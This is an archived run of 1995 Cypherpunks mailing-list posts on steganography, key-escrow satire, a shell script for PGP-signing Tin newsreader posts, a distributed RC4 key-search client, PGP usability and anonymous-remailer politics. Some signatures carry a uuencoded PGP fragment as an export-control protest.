bdAu8TKE4IG9a7fzxK0jqcpHBWqU2SaRxpaPEKl7HXbtFJxdKqn1n/M7INPJxF2w
/JsyZom8gmk=
=Tzje
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bolivar Shagnasty <tj@compassnet.com>
Date: Wed, 19 Jul 95 10:27:12 PDT
To: trei@process.com
Subject: RE: Stego-Rants ?
Message-ID: <Chameleon.4.01.2.950719122621.tj@tjunker.compassnet.com>
MIME-Version: 1.0
Content-Type: text/plain


Peter Trei wrote:

>> Which of the following is the cleartext?
>> 1. Bit and byte dropout can significantly impede communication.
>> 2. Flower and shrub planting can greatly enhance landscaping.
>> 3. Word and phrase substitution can hopelessly disguise meaning.
>> 4. UFO and space-alien belief can seriously damage credibility.
>> (deletia)
>> Bolivar
>
>This class of code is fairly old. 

Thank you.  I would never have suspected.  I grew up in Heinlein's barrel, 
fed through a hole in the side, until I was 18.

>(deletia>
>The suspected spy immediatly sent back 'Is father dead or deceased?', 
>and was arrested. 
>
>The book contains many fascinating stories of stego and attempted 
>stego, including mailed knitting patterns, crossword puzzles, 
>drawings, sports statistics, etc.
>(deletia)

(shrug).  The point is not whether people have used this before, or how cute 
the anecdotes of wartime failures or detections.  The point is that everyone 
uses language in innumerable explainable contexts, and that we have computers 
with which to effortlessly transform text into other text.  There is no need 
to knit, or invent crossword matrices, concoct drawings, or fabricate 
verifiable sports statistics.  With word substitution, anything can mean 
anything.  I never suggested it take the place of encryption, or that I 
thought it a new form of stego.  

The implications may be new in the context of ubiquitous high-speed computers 
and electronic communication, in that the evidentiary value of written 
language can be shown to be so malleable as to be useless.  For example, how 
would you like to have to ascribe particular meaning to the accumulated notes 
and files of someone who collects "exxon" wordlists?  Virtually anything you 
process against any of the wordlists will change into something equally as 
interesting (or uninteresting) as the original.  The presence in a system of 
wordlists tends to reduce the content of natural language files in that 
system to examples of sentence structure.  As an example of just how 
malleable sentence structure templates can be, the defense in such a case 
might convert the prosecution's charging document into a glowing commendation 
of the defendant, suitably introduced through an expert witness.

Bolivar
(who hopes to retire when he finishes school)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Wed, 19 Jul 95 09:21:13 PDT
To: ericande@linknet.kitsap.lib.wa.us (Eric Anderson)
Subject: Re: Govt mandated key
In-Reply-To: <Pine.SUN.3.91.950718221833.16687A-100000@linknet.kitsap.lib.wa.us>
Message-ID: <9507191620.AA22218@leonardo.bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



| I wouldn't register my keys and I don't think ANY of us should either.
| If they threatened me W/ RICO, I would probably register *A* key but 
| certainly not one I EVER indended to actually use.
| In a case like this I think massive civil disobediance would be a good 
| response.

	Registering 2^128 keys is just as good a form of civil
disobedience as refusing to co-operate.  Who was it that said the best
remedy to a bad law is for it to be strictly enforced?

	I think after I register my 2^128 keys (in random order, of
course), I shall from time to time request copies of particular keys
to ensure that they are keeping mine on file.  Actually, I think I can
reasonably be expected to use both IDEA and 3DES, so I shall also
register 2^196 3DES keys.  To simplify the goverments indexing of
these keys, one could also generate key identifiers to will identify
each message with on the outside.  These unrelated numbers would
double or triple the number of bits that would have to be stored.

	Storing or transmitting them might be a bit of a problem, but
I'll expect government assistance in finding a storage medium that can
hold more bits than the number of atoms in the universe.

Adam

-- 
"It is seldom that liberty          I Support The Phil
of any kind is lost all at     Zimmermann legal defense fund
once."               -Hume    http://www.netresponse.com/zldf

------------------ PGP.ZIP Part [001/713] -------------------
M4$L#!!0````(`">9ZQX3(*,_DG8!`-JF`P`'````4$=0+D581>S;=UQ3U__X
M\9M!$E8,TT@PJ$10$1=*41%WW`KX$=Q[M5KK`&R%(HH+(T.M"S>NME8K=31N
M:A$[K+5(K:O5BE405ZE:1"3?UTW`:K_]\/G\?O_^?CX>3^_-S;GGO,^\`^@W
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Wed, 19 Jul 95 10:26:42 PDT
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: TINSIGN:  Simple script for PGP signing messages in Tin 1.22
Message-ID: <Pine.ULT.3.91.950719122403.1187B-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Howdy, me again.  In keeping with my wish to make PGP signing of 
transmissions simple and commonplace, I've got another script for y'all.  
This is for the Tin Newsreader.

I hope you find it useful.

Comments appreciated.

============================================================

#!/bin/sh

# TinSign v1.0
# Written by Robert A. Hayden <hayden@krypton.mankato.msus.edu>

# Based in part on the PGP editor wrapper, Version 1.0 (editpgp)
# Copyright (c) 1994, Mark Lewis <nostra@city.ac.uk>.

# TINSIGN is a simple program that will allow you to automatically sign
# your news messages composed with the TIN 1.2pl2 news reader.  It
# may also work with other news programs, but it has not been tested.

# INSTRUCTIONS FOR CONFIGURING TIN
#
# You need to define the following options in Tin.  This is done via 
# editing the $HOME/.tin/tinrc file.
#
#	A)	start_editor_offset=ON
#	B)	default_editor_format=<path to this script> +%N %F
#		Example:  /users/foo/bar/tinsign +%N %F
#	C)	default_sigfile=/dev/null
#		NOTE:  	I have been unable to get my copy of tin to read 
#			any file other than $HOME/.signature, no matter
#			what this parameter is set to.  The solution I 
#			found was to remove $HOME/.signature and create
#			another file that is read in by defining the
#			variable below.  You may want to experiment with
#			this to find out what works best for you as this 
#			might be a bug specific to our local compilation.

# INSTRUCTIONS FOR CONFIGURING TINSIGN
#
# The PGP program must be in your path, and the PGPPATH environment
# variable must be defined.  See the PGP documentation for details.
#
# In addition to PGP and the editor you define, TinSign also will use the 
# following programs:
#	awk
#	cat
#	echo
#	egrep
#	mv
#	rm
#	sleep
#
# Double check that the first line of this program points to sh.
#
# Execute the command "chmod 700 <path/to/tinsign>".
#
# Edit the SIGPATH and TINEDITOR variables to point at your signature
# (if any) and the editor you wish to use for your Tin messages.  Default
# signature will be the file .signature-tin in your $HOME directory.
# Default editor is pico -z -t.
#
# Define SIGPATH=/dev/null if you do not have an ASCII signature to 
# append.

SIGPATH=$HOME/.signature-tin
TINEDITOR='pico -z -t'

# INSTRUCTIONS FOR USING TINSIGN
#
# When you compose a message, you will compose your message as normal.
#
# When you exit your editor (control-X in Pico), you will receive a 
# prompt asking for your PGP passphrase.  Type this in.  
#
# At this point, if you have defined one, your ASCII signature will be 
# appended to the message AFTER the digital signature.
#
# You will then be put into the Tin menu asking if you wish to edit your 
# posting some more, quit the post (ie, abort it), or post it.

### DO NOT TAMPER BELOW THIS LINE UNLESS YOU KNOW WHAT YOU ARE DOING ###

# Define internal variables
	filename=`echo $2 | cut -f$# -d' '`
	tmpdir=/tmp

#Run editor
	$TINEDITOR +$1 $2

# Split the headers from the body of the article
        awk '{ print }; /^$/ { exit }' $filename > ${tmpdir}/tmp$$.hdr
        awk 'body == 1 { print }; /^$/ { body=1 }' $filename > ${tmpdir}/tmp$$

# Remove "--"
	egrep -ve '^--$' ${tmpdir}/tmp$$ > ${tmpdir}/tmp2$$
	mv ${tmpdir}/tmp2$$ ${tmpdir}/tmp$$

# Sign the message
	pgp -sat +comment="PGP Signed with TinSign 1.0" +clearsig=on ${tmpdir}/tmp$$
	if [ $? -eq 0 ]; then
	        cat ${tmpdir}/tmp$$.hdr ${tmpdir}/tmp$$.asc > $filename
	else
	    echo ""; echo "*Error in signing. Aborted."
	    sleep 5
	fi

# clean up any files in temp space
        rm -f ${tmpdir}/tmp$$.hdr ${tmpdir}/tmp$$.asc ${tmpdir}/tmp$$

# append your ASCII signature to the message
	echo " " >> $filename
	cat $SIGPATH >> $filename




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.1

iQCVAwUBMA1AZjokqlyVGmCFAQGv4QP/XB8BU91sU0KlzWTKkyZaW4j2KYKDzGin
SgbFtdd9KdcoalhLU0myzOvMcpr3QAhAbaXN4Zq56IE/OYm5WL0MUJnJ6GF7kdEc
F2r0vC9Nt7iZrWoG7LsqJrKrlLDp8eFhcWrpkwhH7trWA2jAjqHzof4Gy0fr8LD0
Xc1KEPpQ+JA=
=Jsj3
-----END PGP SIGNATURE-----
 
____        Robert A. Hayden      <=> Cthulhu Matata
\  /__          -=-=-=-=-         <=>          -=-=-=-=-
 \/  /  Finger for Geek Code Info <=> hayden@krypton.mankato.msus.edu
   \/   Finger for PGP Public Key <=> http://att2.cs.mankato.msus.edu/~hayden




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Wed, 19 Jul 95 09:44:55 PDT
To: ab411@detroit.freenet.org
Subject: Re: TIME pathfinder registration
In-Reply-To: <199507180059.UAA12182@detroit.freenet.org>
Message-ID: <9507191640.AA22426@leonardo.bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


What a pain to type.  writecode is easy, and since its been used once,
should be used again.  Trying three or four passwords to get (vaugely)
anonymous access is silly.
A

| >This was me. The password is "writecode", since Pathfinder didn't allow
| >the login and password to be the same.

| Perhaps in the future people might use "sknuprehpyc" in such cases?
| And of course, don't put the list's email address in.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon McAuliffe <Simon.McAuliffe@Comp.VUW.AC.NZ>
Date: Tue, 18 Jul 95 17:45:53 PDT
To: cypherpunks@toad.com
Subject: Re: RC4 crack
In-Reply-To: <199507182047.QAA03926@bb.hks.net>
Message-ID: <199507190045.MAA28819@lido.comp.vuw.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain


shamrock@netcom.com (Lucky Green) wrote on Tuesday, 18 Jul 1995:

> >As to the problem of not having 24-7 connectivity, you could either
> >use the WWW page, or the server (it will do this anyway) will keep
> >re-trying to get a socket connect to the master until it suceeds, so
> >when you next go on-line ...  wham it gets through again as
> >connectivity is resumed and says whatever it has been trying to say.
> >We need it to retry in case of network out (or horror) big master
> >falling over, until it gets resumed.
> 
> On many machines that will mean that it will try to initiate a connection
> to the host. Please allow for a manual connect option.

While we're suggesting features, how about including something (on the
networked version) which performs a quick sanity check on any clients
so we know they're not bogus, ie send one or more known plaintext/ciphertext
pairs with corresponding keys to verify the correctness of the compilation.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: netchaos@ix.netcom.com (Daniel Gannon )
Date: Wed, 19 Jul 95 12:56:23 PDT
To: cypherpunks@toad.com
Subject: Adding
Message-ID: <199507191954.MAA04876@ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I would like to be added to your list.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Date: Wed, 19 Jul 95 11:40:59 PDT
To: cypherpunks@toad.com
Subject: Re: cypherpunk "Zen" victories
Message-ID: <199507191840.NAA18738@netman.eng.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain



Vladimir Z. Nuri scribbled:
>
>I was recently marvelling at how much the "cypherpunk agenda"
>is being advanced even in light of what would seem to be setbacks.
>Particularly in the area of anonymous remailers. We now have a very
>major article on remailers and Julf's setup in the NYT that portrays
>them in an unbiased, unhysteria-stricken mode. Also in the article,
>it quotes the police as regretting their falling victim to
>Scientology manipulation and investigating the remailer "without
>cause". A major officer is quoted as saying, roughly, "we are
>going to need a crime before we investigate in the future". 
>

Could you provide a page, date, and title for this article? I would
like to read it but don't get a daily subscription.

Muchas gracias

 Doug Hughes				Engineering Network Services
 doug@eng.auburn.edu			Auburn University



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jfmesq@ibm.net (James F. Marshall)
Date: Wed, 19 Jul 95 13:52:28 PDT
To: hayden@krypton.mankato.msus.edu
Subject: Re: "Hey Phil! Stop telling people *not* to use PGP!" (plu
Message-ID: <199507192052.UAA52104@smtp-gw01.ny.us.ibm.net>
MIME-Version: 1.0
Content-Type: text/plain


>I've received about 200 requests since Monday from people asking where to
>find PGP, asking about similiar scripts for Windoze or Dos or Mac....

If anyone asks about OS/2, a good script is available at
ftp.gibbon.com.

FWIW.

--JFM





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <Michael@umlaw.demon.co.uk>
Date: Wed, 19 Jul 95 08:19:59 PDT
To: liberty@gate.net
Subject: Re: Root Causes Roots cont.
Message-ID: <2561@umlaw.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


As my final word on this thread, let me say that if you are really
interested in the 9th Amendment, by far the best legal article on 
the subject  that I know of is Charles L. Black, Jr, On Reading 
and Using the Ninth Amendment.   I have not visited the Cato web 
pages, but their journal tends to be on the shallow side.  I am 
far from LEXIS right now so I can't give you a citation for the 
Black article, but it is brilliant.  It would also make a 
libertarian's hair stand on end.  For hours.
-- 
Michael Froomkin                   until Aug 6: michael@umlaw.demon.co.uk
U.Miami School of Law                                     London, England
mfroomki@umiami.ir.miami.edu <-- this will still find me
PO Box 248087 Coral Gables, FL 33124-8087     Rain. Sun. Rain. Sun. Rain.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Wed, 19 Jul 95 12:00:14 PDT
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Re: "Hey Phil! Stop telling people *not* to use PGP!" (plus: "help me with my PGP problems!") (fwd)
Message-ID: <Pine.ULT.3.91.950719135958.2882B-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 19 Jul 1995, Bryce Wilcox wrote:

[lots of really really good stuff deleted, because I really don't have 
anything good to add to it]

> I am fond of saying that we PGP enthusiasts have two choices ahead of us
> within a couple of years:  either 5,000 enthusiasts using PGP with
> MAXIMAL SECURITY at all times, or 5,000 enthusiasts with MAXIMAL
> SECURITY and 10,000,000 computer-illiterate e-mail users using PGP with
> push-button interfaces and multi-user remote systems.

I said it last week, and I'll say it again.  From a sociological
standpoint, it's those 10,000,000 computer-illiterate e-mail users that we
need to focus all of our efforts towards.  Those 5,000 literate people we 
really don't have to care about.

I will say, and this makes for interesting commentary, over the last week
or so, I've released those simple scripts for Pine (and today for Tin)
that integrate digital signing fairly seamlessly with those programs. 
I've received about 200 requests since Monday from people asking where to
find PGP, asking about similiar scripts for Windoze or Dos or Mac, or
thanking me for providing an easier way to do digital signatures.  And
that was a simple sh script!  Imagine if some people with REAL writing 
ability worked on some programs...

Pushing for wide use of digital signatures is one way to get PGP to be a 
"household" name for people writing on the net.  I now sign everything I 
post and mail.  It gets people's attention and interest.  Interest leads 
to use.

> The important thing, of course, is the easy-to-use, e-mail-integrated
> software (version 3.0, I hope?), but it would also help if Zimmermann's
> PGP Doc didn't tell those computer-illiterates to either "become enthusiasts
> or don't use it."

I think the politics of PGP is stagnated at about two years ago or so.  
The demographics are no longer accepting to long technical rants.  
Today's generation of net.user doesn't need 100% security 100% of the
time, what they need is "good" security when they want it, but in a way 
that they don't have to think much about.

Sorry if I'm ranting again abotu everything I said last week.  I'm in the
process of doing research on social evolution using the net as an example
of accelerated cultural change.  I'm kinda in a specific mindset right now
:-). 

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.1

iQCVAwUBMA1WVjokqlyVGmCFAQEtJgP+JPbrM4KSQGiIznlnghYs1FEizGGhHLJZ
+cSz36jatErJ/kFOEsNSwLz0crjdyHtv2v3ojsExTQVgQxzS/U60zwNR+gPxwdr7
bpIoEaZwGtANmsrkUtTqIwEncs7WPAF08ZbbaZpeB58qcvnpAergshrJya7gtOSM
Wp8BqFcU+84=
=TOLZ
-----END PGP SIGNATURE-----
 
____        Robert A. Hayden      <=> Cthulhu Matata
\  /__          -=-=-=-=-         <=>          -=-=-=-=-
 \/  /  Finger for Geek Code Info <=> hayden@krypton.mankato.msus.edu
   \/   Finger for PGP Public Key <=> http://att2.cs.mankato.msus.edu/~hayden




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Wed, 19 Jul 95 11:10:52 PDT
To: wilcoxb@nagina.cs.colorado.edu (Bryce Wilcox)
Subject: Re: "Hey Phil!  Stop telling people *not* to use PGP!"  (plus: "help me with my PGP problems!")
In-Reply-To: <199507191744.LAA04117@nagina.cs.colorado.edu>
Message-ID: <9507191810.AA22858@leonardo.bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



|   The problem/gripe is that whenever I try to manipulate public keys on
| my keyring, PGP grabs the first one with User ID "Bryce".  How do I extract,
| edit, sign, etc. the *other* "Bryce" keys on my public keyring.  I tried
| giving PGP the Key ID, which seemed like the most reasonable user interface
| to me, but that didn't work.

	You often need to use 0xKEYID.  I name my keys with expiration
dates in them, so I can simply type 95 or 96 to id a key pretty
uniquely.

pub 1024/E794DA91 1994/06/09 Adam Shostack <adam@bwh.harvard.edu>[Exp July 96] 
sig       876BD629          Adam Shostack <adam@bwh.harvard.edu>[exp June 95]


Also, the MyName option in config.txt is worth looking at.

| Third, how do I set those "PGP-Note" strings that appear in some people's
| PGP Signature Blocks?

pgp -sa +comment="Boycott Clipper!"
or comment in your config.txt


	With regards to docs, I tend to point people at Simson
Garfinkel's pgp book.  Most people find reading a book better than
reading online docs, and Simson does a fairly good job of explaining
everything.


Adam

-- 
"It is seldom that liberty          I Support The Phil
of any kind is lost all at     Zimmermann legal defense fund
once."               -Hume    http://www.netresponse.com/zldf

------------------ PGP.ZIP Part [001/713] -------------------
M4$L#!!0````(`">9ZQX3(*,_DG8!`-JF`P`'````4$=0+D581>S;=UQ3U__X
M\9M!$E8,TT@PJ$10$1=*41%WW`KX$=Q[M5KK`&R%(HH+(T.M"S>NME8K=31N
M:A$[K+5(K:O5BE405ZE:1"3?UTW`:K_]\/G\?O_^?CX>3^_-S;GGO,^\`^@W
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zinc <zinc@zifi.genetics.utah.edu>
Date: Wed, 19 Jul 95 13:11:44 PDT
To: cypherpunks <cypherpunks@toad.com>
Subject: cfs on linux - rpcgen broken in slackware distribution!
Message-ID: <Pine.LNX.3.91.950719141024.3126P-100000@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


cpunks,

yesterday i requested some help compiling cfs on my linux system.  well, 
after some serious help i got it to work.

the problem was that my copy of rpcgen was broken.  this was the copy 
installed with the slackware distribution.

damn, this is some sort of never ending contest between my sanity and the 
slackware distribution!

-pat

patrick finerty = zinc@zifi.genetics.utah.edu = pfinerty@nyx.cs.du.edu
U of Utah biochem grad student in the Bass lab - zinc fingers + dsRNA!
** FINGER ME for my pgp public key ** crypto for the masses!
zifi runs LINUX 1.2.11 -=-=-=WEB=-=-=->  http://zifi.genetics.utah.edu 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Wed, 19 Jul 95 13:01:44 PDT
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Re: TINSIGN: Simple script for PGP signing messages in Tin 1.22
In-Reply-To: <Pine.ULT.3.91.950719122403.1187B-100000@krypton.mankato.msus.edu>
Message-ID: <Pine.ULT.3.91.950719150126.5448A-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

[my duplicate posting deleted]

ARGH!

Sorry folx.  I forgot about that buggy feed.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.1

iQCVAwUBMA1ktjokqlyVGmCFAQFhaQQAtUG6p4Jr0DBEI02lKNRDfhkw4gt7C8oA
jn43BK/VPF4r8sSSoxOvJFL8a5HHoP/RhXGWu5sQ4W6NOzFEm8KkjlChV7LbmUzP
T+6q/8cZlOq4oa2Ja4WzGosbQ0SfKaHb6nGEkfKGWXMeijsVugYqlmw8y+ge2oXc
5Rv7z69dwpc=
=CXY5
-----END PGP SIGNATURE-----
 
____        Robert A. Hayden      <=> Cthulhu Matata
\  /__          -=-=-=-=-         <=>          -=-=-=-=-
 \/  /  Finger for Geek Code Info <=> hayden@krypton.mankato.msus.edu
   \/   Finger for PGP Public Key <=> http://att2.cs.mankato.msus.edu/~hayden




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Wed, 19 Jul 95 13:08:21 PDT
To: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Subject: Re: "Hey Phil! Stop telling people *not* to use PGP!" (plus: "help mewith my PGP problems!") (fwd)
Message-ID: <9507192005.AA00307@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Robert A. Hayden writes:
>  I said it last week, and I'll say it again.  From a sociological
>  standpoint, it's those 10,000,000 computer-illiterate e-mail users
>  that we need to focus all of our efforts towards.  Those 5,000
>  literate people we really don't have to care about.
[...snip...]
>  Imagine if some people with REAL writing ability worked on some
>  programs...
[...snip...]
>  I think the politics of PGP is stagnated at about two years ago or
>  so.  The demographics are no longer accepting to long technical
>  rants.  Today's generation of net.user doesn't need 100% security
>  100% of the time, what they need is "good" security when they want
>  it, but in a way that they don't have to think much about.

This has been hashed over on the list many, many times in the past.  I  
suspect there are competent programmers out there who want to write  
easy-to-use interfaces for PGP (I know at least one), but there are problems.  
 To write a good GUI interface (with proper key-management features) on  
Windows or Mac, for instance, you need to have access to PGP's internal  
crypto routines as well as the routines for reading and writing PGP messages  
and key certificates.  The problem is that the PGP 2 code does not have the  
internal 'core' routines separated from it's command-line interface.

The answers are to either shell out to PGP (which, AFAIK, is what every  
interface except MacPGP does), hack the PGP 2 code, or use PGPTools.

Shelling out to PGP isn't going to cut it for a slick GUI package, especially  
if you want to have a decent key-management interface.  You could do it, but  
it will be slow and kludgy and you will have to change it all when PGP 3  
comes out.

Hacking PGP would be a major effort.  Additionally, there is risk of  
introducing a subtle flaw in the crypto routines.  However, the main killer  
is that PGP 3 is going to have a brand new key-ring format along with many  
other enhancements, fixes, and other changes to the crypto code.  All of the  
work will have to be done again to bring the interface up to date when PGP 3  
is released, which could be within 6 months (who knows?).

PGPTools is buggy and not supported.  Any effort to bring PGPTools up to a  
stable level would likely be thrown away when PGP 3 is released.

The real solution is that PGP 3 will have all of it's core routines in a  
separate library with a stable API specifically for the purpose of writing  
slick interfaces.  So basically all of the would-be PGP interface developers  
are waiting for beta releases of the library.  Unfortunately, this has been  
the situation for almost two years now.  By now the PGP 2 code could have  
been completely turned into a library with a clean API and no command-line  
interface remnants, but developers have been discouraged by the promise of  
PGP 3 coming out 'RSN'...


andrew
...still waiting for pgp 3 news...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Wed, 19 Jul 95 13:31:41 PDT
To: stewarts@ix.netcom.com
Subject: bi-directional dining cryptographers
In-Reply-To: <199507180649.XAA25432@ix3.ix.netcom.com>
Message-ID: <199507192027.AA25383@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


I know that it would be difficult. In _that_ part I was just
playing around. It's at least as valid as mechanically-written
letters as a list topic.

(Well, I thought it was a funny if dreadful idea).

Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Wed, 19 Jul 95 16:33:14 PDT
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: cypherpunk "Zen" victories
In-Reply-To: <199507191703.KAA20332@netcom23.netcom.com>
Message-ID: <Pine.SUN.3.91.950719162702.8888A-100000@crl2.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

I'm almost at a loss for words.  I have had my troubles with, and
suspicions of, "Vladimir Z. Nuri."  Right now, though, I don't
care if he is the DetMan or not.  His most recent posting, 
"cypherpunk `Zen' victories," was dead bang right on.  For those
of you who may have deleted it without reading it, I have 
included it below.  It's very, very good.

Hey, if it really is you, Larry, stay on the medication (or off 
it, as the case my be).


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


On Wed, 19 Jul 1995, Vladimir Z. Nuri wrote:

> I was recently marvelling at how much the "cypherpunk agenda"
> is being advanced even in light of what would seem to be setbacks.
> Particularly in the area of anonymous remailers. We now have a very
> major article on remailers and Julf's setup in the NYT that portrays
> them in an unbiased, unhysteria-stricken mode. Also in the article,
> it quotes the police as regretting their falling victim to
> Scientology manipulation and investigating the remailer "without
> cause". A major officer is quoted as saying, roughly, "we are
> going to need a crime before we investigate in the future". 
> 
> Look what we got out of this: 
> 
> 1) incredible positive publicity for Julf,
> Hero of the Net 
> 
> 2) introduction of the concept of anonymous remailers
> to the layman 
> 
> 3) police awareness. increased reluctance to go on anonymous remailer
> witchhunts. advice to other police to do the same.
> 
> 4) only *one* address was compromised on Julf's system. a small price
> to pay for all this
> 
> 5) Time Magazine also did an article on Julf a few months ago and
> this compromise in identity. *astonishing* publicity.
> 
> All in all, I would say the effect was an overall "net positive".
> It reminds me of a zen-like saying, "sometimes you lose by winning
> and win by losing". It would seem on the face of it that  the
> Helsingius Affair was a debacle from the point of view  of pseudonymity.
> However I would consider it a extraordinary success. 
> 
> The major foes of pseudonymity have so far been misguided police forces 
> in Finland, who now say they resent the solicitude of the US into their own
> affairs, and would not be so eager to cooperate in the future;
> another foe is a radical religious cult that is finding its own
> set of 20th century heretics, and attempting to excommunicate them.
> In the meantime, with each exposure, the idea of anonymity and
> pseudonymity is gaining powerful friends.
> 
> Also, a long time ago a major foe of anonymity was Dick Depew. An
> article came out on him in the WSJ that made him look awfully
> silly.  He is roundly considered one of the more legendary net
> crackpots today. 
> 
> ===
> 
> I'd also like to point out that the recent Rimm job affair is
> another "net positive" for the net. Rimm has been so utterly
> thoroughly discredited and blackened by his own personality
> and background, as reported by Brock Meeks recently, it is 
> amazingly hilarious. Rimm has become the laughingstock of
> cyberspace in the way that Cantor and Siegal were
> 
> We could not have asked for a better setup for embarrassing
> and humiliating the media into realizing the core issues
> involving pornography on the internet. If someone did this
> intentionally, it would have been considered a brilliant
> trap. Time and DeWitt have been savaged by very reputable people, and 
> I'm sure they consider the article a fiasco from a credibility standpoint.
> Any magazine that covers pornography in cyberspace in the future
> will be very gunshy and will not be so flippant, if they can
> stand poking the hornet's nest at all.
> 
> ===
> 
> Another area is in the bills that are being introduced in congress.
> It would seem these are a fiasco from the point of view of
> those interested in cyberspace. But there are backlashes even
> in congress. Was it Markey that introduced a bill that made
> cyberspace off limits to future draconian legislation? All this
> also forces legislators to figure out what the hell they are dealing
> with, and they are finding out what their own authority in the 
> matter is. I think the wise ones may figure out that if they
> don't play nice, we may take our marbles away and go play with
> someone else. D.Frissell said something profound in his letter
> to the editor, "Congress thinks the Internet can be controlled.
> We who built it, and continue to build it, think it cannot be.
> It will be interesting to see who is right". His comparing it
> with the ideas in the declaration of independence, that "when
> a government no longer serves the people, they have a right to
> overthrow it", is extremely apropos in cyberspace, where it
> may be more possible than ever for those who desire freedom
> to make those who are apposed to it, completely irrelevant.
> 
> T.May suggest that we just give up the fight in congress, saying
> that bills can be introduced faster than we can fight them. I
> agree with the observation but not the conclusion. 
> Bills have a very hard time getting to be law.
> They are very fragile in initial stages, and at these points they
> can indeed be killed with a little pressure in the right spots.
> We are learning where those spots are.
> 
> At this point I think it is not in the interests of those promoting
> cyberspace to try to evade congress. So far, it has not proved itself
> to be completely hostile to the point of trying to shut down cyberspace
> to the degree it does not fit its own agenda. And as long as they
> are not outright enemies, some could be turned into powerful
> promoters. The idea of abandoning educating/influencing congress 
> entirely seems like a kind of unhealthy nihilism to me. There are
> allies in congress and there are people listening there. Their 
> unawareness seems amazingly proportional to the cluelessness of
> the general population about cyberspace (and I see extremely
> encouraging signs both are rapidly diminishing).
> 
> The bills seem to becoming more desperate and draconian in their
> language. This is a sign of fear and dread on the side that seeks
> to regulate bits. They are in a tricky position, because the more
> draconian the language, the less likely it is to be passed and
> taken seriously. People become suspicious and hypersensitive to
> the infractions. To a large degree, many parts in the government
> only gain their power through secrecy. As people become more aware
> of the power flow, they disrupt and seize it themselves. Every bill
> that has more desperate language is the other side revealing
> their secret agenda, to control thought, which I think reasonable 
> people are increasingly considering and recognizing as bogus
> and bankrupt.
> 
> Congress will eventually polarize into being generally promoting
> of cyberspace, or outrightly hostile to it. Cyberspace will
> inevitably escape its grip if congress goes in this direction. To use
> Zen analogies again, there is the idea that water is the most
> powerful force on the earth, because it simply flows around
> that which opposes it. I find that cyberspace is wholly analogous.
> In fact it seems to me that cyberspace would give Lao Tzu
> a whole new cuttingly apt metaphor for his philosophies!!
> 
> ===
> 
> So the next time that you rant about how some bill or another
> means the Death of the Net, or the police investigating a remailer
> means the downfall of cryptoanarchy, or a lousy article with a
> zillion distortions comes out, think again. The greatest cypherpunk
> victories are emerging through what would appear at first to be the 
> "blackest" moments.
> 
> viva la cryptoanarchy!!!
> 
> 
> ~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^
